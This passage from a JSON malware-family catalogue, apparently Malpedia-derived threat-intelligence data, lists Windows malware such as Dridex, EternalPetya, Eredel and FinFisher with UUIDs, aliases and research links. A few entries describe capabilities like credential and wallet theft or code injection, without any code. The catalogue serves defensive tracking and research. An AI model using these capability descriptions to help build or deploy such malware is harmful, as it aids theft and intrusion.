"http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html" ], "synonyms": [], "type": [] }, "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", "value": "NgrBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", "value": "Dorshel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", "value": "DoublePulsar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" ], "synonyms": [ "DELPHACY" ], "type": [] }, "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", "value": "Downdelph" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" ], "synonyms": [], "type": [] }, "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", "value": "Downeks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", "http://www.clearskysec.com/charmingkitten/" ], "synonyms": [], "type": [] }, "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", "value": "DownPaper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" ], "synonyms": [], "type": [] }, "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", "value": "DramNudge" }, { "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", "https://lokalhost.pl/gozi_tree.txt", "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" ], "synonyms": [], "type": [] }, "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", "value": "DreamBot" }, { "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", "https://viql.github.io/dridex/", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [], "type": [] }, "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", "value": "Dridex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/" ], "synonyms": [], "type": [] }, "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", "value": "DROPSHOT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" ], "synonyms": [], "type": [] }, "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", "value": "DtBackdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" ], "synonyms": [], "type": [] }, "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", "value": "DarkHotel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", "https://github.com/ch0sys/DUBrute" ], "synonyms": [], "type": [] }, "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", "value": "DUBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" ], "synonyms": [], "type": [] }, "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", "value": "Dumador" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" ], "synonyms": [], "type": [] }, "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", "value": "DuQu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", "value": "Duuzer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates" ], "synonyms": [ "Dyreza" ], "type": [] }, "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", "value": "Dyre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], "type": [] }, "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", "value": "EDA2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", "value": "EHDevel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", "value": "Elirks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", "https://www.joesecurity.org/blog/8409877569366580427" ], "synonyms": [], "type": [] }, "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", "value": "Elise" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", "value": "Emdivi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", "https://twitter.com/thor_scanner/status/992036762515050496" ], "synonyms": [], "type": [] }, "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", "value": "Empire Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" ], "synonyms": [ "Lurid" ], "type": [] }, "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", "value": "Enfal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html" ], "synonyms": [], "type": [] }, "uuid": "c4490972-3403-4043-9d61-899c0a440940", "value": "EquationDrug" }, { "description": "Rough collection EQGRP samples, to be sorted", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", "https://laanwj.github.io/2016/08/28/feintcloud.html", "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", "https://laanwj.github.io/2016/08/22/blatsting.html", "https://laanwj.github.io/2016/09/11/buzzdirection.html", "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", "https://laanwj.github.io/2016/09/01/tadaqueos.html", "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html" ], "synonyms": [], "type": [] }, "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", "value": "Equationgroup (Sorting)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" ], "synonyms": [], "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (Windows)" }, { "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" ], "synonyms": [], "type": [] }, "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", "value": "Eredel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", "http://www.intezer.com/notpetya-returns-bad-rabbit/", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", "https://www.riskiq.com/blog/labs/badrabbit/", "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", "https://securelist.com/schroedingers-petya/78870/", "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", "https://securelist.com/bad-rabbit-ransomware/82851/" ], "synonyms": [ "BadRabbit", "Diskcoder.C", "ExPetr", "NonPetya", "NotPetya", "Nyetya", "Petna", "Pnyetya", "nPetya" ], "type": [] }, "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", "value": "EternalPetya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ "HighTide" ], "type": [] }, "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", "value": "EtumBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", "https://www.cyphort.com/evilbunny-malware-instrumented-lua/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [], "type": [] }, "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", "value": "Evilbunny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" ], "synonyms": [ "Vidgrab" ], "type": [] }, "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", "value": "EvilGrab" }, { "description": "Privately modded version of the Pony stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/", "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/" ], "synonyms": [ "CREstealer" ], "type": [] }, "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", "value": "EvilPony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" ], "synonyms": [], "type": [] }, "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", "value": "Evrial" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" ], "synonyms": [ "Saber", "Sabresac" ], "type": [] }, "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", "value": "Excalibur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "74f8db32-799c-41e5-9815-6272908ede57", "value": "MS Exchange Tool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html" ], "synonyms": [ "ExtRat" ], "type": [] }, "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", "value": "Xtreme RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" ], "synonyms": [], "type": [] }, "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", "value": "Eye Pyramid" }, { "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "https://github.com/360netlab/DGA/issues/36", "http://www.freebuf.com/column/153424.html" ], "synonyms": [ "WillExec" ], "type": [] }, "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", "value": "FakeDGA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" ], "synonyms": [ "Braviax" ], "type": [] }, "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", "value": "FakeRean" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" ], "synonyms": [], "type": [] }, "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", "value": "FakeTC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" ], "synonyms": [], "type": [] }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", "value": "Fanny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" ], "synonyms": [], "type": [] }, "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", "value": "FantomCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf", "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", "value": "Felismus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" ], "synonyms": [], "type": [] }, "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", "value": "Felixroot" }, { "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", "https://feodotracker.abuse.ch/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" ], "synonyms": [ "Bugat", "Cridex" ], "type": [] }, "uuid": "66781866-f064-467d-925d-5e5f290352f0", "value": "Feodo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" ], "synonyms": [], "type": [] }, "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", "value": "FF RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" ], "synonyms": [], "type": [] }, "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", "value": "FileIce" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/" ], "synonyms": [], "type": [] }, "uuid": "87467366-679d-425c-8bea-b9f77c543252", "value": "Final1stSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" ], "synonyms": [ "Poseidon" ], "type": [] }, "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", "value": "FindPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" ], "synonyms": [ "FinSpy" ], "type": [] }, "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", "value": "FinFisher RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" ], "synonyms": [], "type": [] }, "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", "value": "Fireball" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" ], "synonyms": [], "type": [] }, "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", "value": "FireCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", "value": "FireMalv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", "https://twitter.com/JaromirHorejsi/status/815949909648150528" ], "synonyms": [], "type": [] }, "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", "https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" ], "synonyms": [], "type": [] }, "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", "value": "FlawedAmmyy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", 